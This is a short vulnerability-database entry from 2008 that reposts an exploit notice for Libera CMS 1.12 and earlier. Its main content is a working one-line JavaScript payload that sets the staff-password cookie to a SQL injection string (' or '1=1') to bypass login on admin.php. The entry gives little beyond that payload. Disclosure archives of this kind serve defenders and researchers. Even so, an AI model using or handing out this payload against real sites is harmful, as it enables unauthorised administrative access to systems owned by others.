Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit

2008-09-10T00:00:00
ID SSV:9450
Type seebug
Reporter Root
Modified 2008-09-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                --==+============================================================================+==--
--==+        Libera CMS <= 1.12 Remote SQL Injection Exploit  (Cookie)           +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 10 Sep 2008
 [+] Download: http://downloads.sourceforge.net/liberacms/Libera112.tar.gz?modtime=1209304487&big_mirror=0
 
 [*] Page: admin.php / insert the code javascript and refresh

 [*] Exploit: javascript: document.cookie = "libera_staff_pass=' or '1=1";